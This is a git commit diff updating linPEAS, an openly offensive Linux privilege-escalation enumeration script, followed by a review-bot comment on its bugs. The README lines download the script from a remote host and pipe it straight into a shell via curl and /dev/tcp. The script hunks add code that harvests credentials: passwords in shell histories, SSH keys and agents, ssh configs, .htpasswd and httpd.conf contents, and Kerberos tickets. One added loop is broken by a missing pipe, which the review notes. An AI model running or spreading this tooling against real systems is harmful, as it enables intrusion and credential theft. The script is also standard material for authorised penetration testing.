
linPEASv2.1.8

carlospolop 2019-11-17 19:23:23 -05:00
parent 1e08eeddeb
commit cc58cd96eb
2 changed files with 28 additions and 14 deletions

@ -21,7 +21,7 @@ python -m SimpleHTTPServer 80
curl 10.10.10.10/linpeas.sh | sh
#Without curl
nc -lvnp 80 < linpeas.sh
nc -q 5 -lvnp 80 < linpeas.sh
cat < /dev/tcp/10.10.10.10/80 | sh
```

@ -1,6 +1,6 @@
#!/bin/sh
VERSION="v2.1.7"
VERSION="v2.1.8"
###########################################
#---------------) Colors (----------------#
@ -122,7 +122,7 @@ USER=`whoami`
HOME=/home/$USER
GROUPS="ImPoSSssSiBlEee"`groups $USER 2>/dev/null | cut -d ":" -f 2 | tr ' ' '|' | sed 's/|/\\\|/g'`
pwd_inside_history="PASSW\|passw\|root\|sudo\|^su\|pkexec\|^ftp\|mongo\|psql\|mysql\|rdekstop\|xfreerdp\|^ssh\|@"
pwd_inside_history="7z\|unzip\|PASSW\|passw\|root\|sudo\|^su\|pkexec\|^ftp\|mongo\|psql\|mysql\|rdesktop\|xfreerdp\|^ssh\|@"
WF=`find /home /tmp /var /bin /etc /usr /lib /media /mnt /opt /root /dev -type d -maxdepth 2 '(' '(' -user $USER ')' -or '(' -perm -o=w ')' ')' 2>/dev/null | sort`
file=""
@ -1081,6 +1081,7 @@ if [ "`echo $CHECKS | grep SofI`" ]; then
certsbin=`find /home /usr /root /etc /opt /var /mnt \( -name "*.csr" -o -name "*.der" \) 2>/dev/null | grep -v "/usr/share/\|/etc/ssl/"`
clientcert=`find /home /usr /root /etc /opt /var /mnt \( -name "*.pfx" -o -name "*.p12" \) 2>/dev/null | grep -v "/usr/share/\|/etc/ssl/"`
sshagents=`find /tmp -name "agent*" 2>/dev/null`
homesshconfig=`find /home /root -name config 2>/dev/null | grep "ssh"`
if [ "$ssh" ]; then
printf "$ssh\n"
@ -1095,18 +1096,23 @@ if [ "`echo $CHECKS | grep SofI`" ]; then
printf "Private SSH keys found!:\n$privatekeyfilesgrep\n" | sed "s,.*,${C}[1;31m&${C}[0m,"
fi
if [ "$certsb4_grep" ] || [ "$certsbin" ]; then
echo " -- Some certificates were found:"
echo " --> Some certificates were found:"
printf "$certsb4_grep\n"
printf "$certsbin\n"
fi
if [ "$clientcert" ]; then
echo " -- Some client certificates were found:"
echo " --> Some client certificates were found:"
printf "$clientcert\n"
fi
if [ "$sshagents" ]; then
echo " -- Some SSH Agents were found:"
echo " --> Some SSH Agents were found:"
printf "$sshagents\n"
fi
if [ "$homesshconfig" ]; then
echo " --> Some home ssh config file was found"
printf "$homesshconfig\n"
for f in $homesshconfig; do cat $f 2>/dev/null sed "s,User\|ProxyCommand,${C}[1;31m&${C}[0m,"; done
fi
echo ""
##-- 23SI) PAM auth
@ -1143,6 +1149,7 @@ if [ "`echo $CHECKS | grep SofI`" ]; then
else echo_not_found "krb5.conf"
fi
ls -l "/tmp/krb5cc*" "/var/lib/sss/db/ccache_*" "/etc/opt/quest/vas/host.keytab" 2>/dev/null || echo_not_found "tickets kerberos"
klist 2>/dev/null || echo_not_found "klist"
echo ""
##-- 27SI) kibana
@ -1330,13 +1337,13 @@ if [ "`echo $CHECKS | grep IntFiles`" ]; then
##-- 14IF) Backup files
printf $Y"[+] "$GREEN"Backup files?\n"$NC
backs=`find /var /etc /bin /sbin /home /usr/local/bin /usr/local/sbin /usr/bin /usr/games /usr/sbin /root /tmp -type f \( -name "*backup*" -o -name "*\.bak" -o -name "*\.bck" -o -name "*\.bk" \) 2>/dev/null`
for b in $backs; do if [ -r $b ]; then ls -l $b | grep -v $notBackup | sed "s,backup\|bck\|\.bak,${C}[1;31m&${C}[0m,g"; fi; done
backs=`find /var /etc /bin /sbin /home /usr/local/bin /usr/local/sbin /usr/bin /usr/games /usr/sbin /root /tmp -type f \( -name "*backup*" -o -name "*\.bak" -o -name "*\.bck" -o -name "*\.bk" -o -name "*\.old" \) 2>/dev/null`
for b in $backs; do if [ -r $b ]; then ls -l $b | grep -v $notBackup | sed "s,backup\|bck\|\.bak\|\.old,${C}[1;31m&${C}[0m,g"; fi; done
echo ""
##-- 15IF) DB files
printf $Y"[+] "$GREEN"Looking for readable .db files\n"$NC
dbfiles=`find /var /etc /home /root /tmp /usr /opt -type f -name "*.db" 2>/dev/null`
printf $Y"[+] "$GREEN"Looking for readable .db files (limit 100)\n"$NC
dbfiles=`find /var /etc /home /root /tmp /usr /opt -type f -name "*.db" 2>/dev/null | head -n 100`
for f in $dbfiles; do if [ -r $f ]; then echo $f; fi; done
echo ""
@ -1351,15 +1358,22 @@ if [ "`echo $CHECKS | grep IntFiles`" ]; then
##-- 17IF) Interesting hidden files
printf $Y"[+] "$GREEN"*_history, .sudo_as_admin_successful, profile, bashrc, httpd.conf, .plan, .htpasswd, .git-credentials, .rhosts, hosts.equiv, Dockerfile, docker-compose.yml\n"$NC
printf $B"[i] "$Y"https://book.hacktricks.xyz/linux-unix/privilege-escalation#read-sensitive-data\n"$NC
fils=`find / -type f \( -name "*_history" -o -name ".sudo_as_admin_successful" -o -name ".profile" -o -name "*bashrc" -o -name "httpd.conf" -o -name "*.plan" -o -name ".htpasswd" -o -name ".git-credentials" -o -name "*.rhosts" -o -name "hosts.equiv" -o -name "Dockerfile" -o -name "docker-compose.yml" \) 2>/dev/null`
fils=`find /var /etc /home /root /tmp /usr /opt /mnt -type f \( -name "*_history" -o -name ".sudo_as_admin_successful" -o -name ".profile" -o -name "*bashrc" -o -name "*httpd.conf" -o -name "*.plan" -o -name ".htpasswd" -o -name ".git-credentials" -o -name "*.rhosts" -o -name "hosts.equiv" -o -name "Dockerfile" -o -name "docker-compose.yml" \) 2>/dev/null`
for f in $fils; do
if [ -r $f ]; then
ls -l $f 2>/dev/null | sed "s,bash_history\|\.sudo_as_admin_successful\|\.plan\|\.htpasswd\|\.git-credentials\|\.rhosts\|,${C}[1;31m&${C}[0m," | sed "s,$sh_usrs,${C}[1;96m&${C}[0m,g" | sed "s,$USER,${C}[1;95m&${C}[0m,g" | sed "s,root,${C}[1;31m&${C}[0m,g";
g=`echo $f | grep "_history"`
if [ $g ]; then
ls -l $f 2>/dev/null | sed "s,bash_history\|\.sudo_as_admin_successful\|\.plan\|\.htpasswd\|\.git-credentials\|\.rhosts\|httpd.conf,${C}[1;31m&${C}[0m," | sed "s,$sh_usrs,${C}[1;96m&${C}[0m,g" | sed "s,$USER,${C}[1;95m&${C}[0m,g" | sed "s,root,${C}[1;31m&${C}[0m,g";
if [ `echo $f | grep "_history"` ]; then
printf $GREEN"Looking for possible passwords inside $f\n"$NC
cat $f | grep $pwd_inside_history | sed "s,$pwd_inside_history,${C}[1;31m&${C}[0m,"
echo ""
elif [ `echo $f | grep "httpd.conf" ` ]; then
printf $GREEN"Reading $f\n"$NC
cat $f | sed "s,htaccess.*\|htpasswd.*,${C}[1;31m&${C}[0m,"
echo ""
elif [ `echo $f | grep "htpasswd" ` ]; then
printf $GREEN"Reading $f\n"$NC
cat $f | sed "s,.*,${C}[1;31m&${C}[0m,"
echo ""
fi;
fi;
done
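Review bot: In the hunk at `-1095,18 +1096,23`, the new home ssh config loop has no pipe between `cat $f 2>/dev/null` and `sed`, so `sed` and its expression are handed to `cat` as extra file names, the `User`/`ProxyCommand` highlighting never runs, and the redirect hides the resulting errors. The line should read `for f in $homesshconfig; do cat "$f" 2>/dev/null | sed "s,User\|ProxyCommand,${C}[1;31m&${C}[0m,"; done`. That block and the httpd.conf/htpasswd branches added in the last hunk also use discovered paths as the printf format (`printf "$homesshconfig\n"`, `printf $GREEN"Reading $f\n"$NC`), so a path containing `%` or a backslash is misprinted; `printf '%s\n' "$homesshconfig"` avoids that. Because the new branches print ssh config, httpd.conf and .htpasswd contents in full, a comment such as `# output now includes credential material; store the report as sensitive` would help whoever keeps or shares the results.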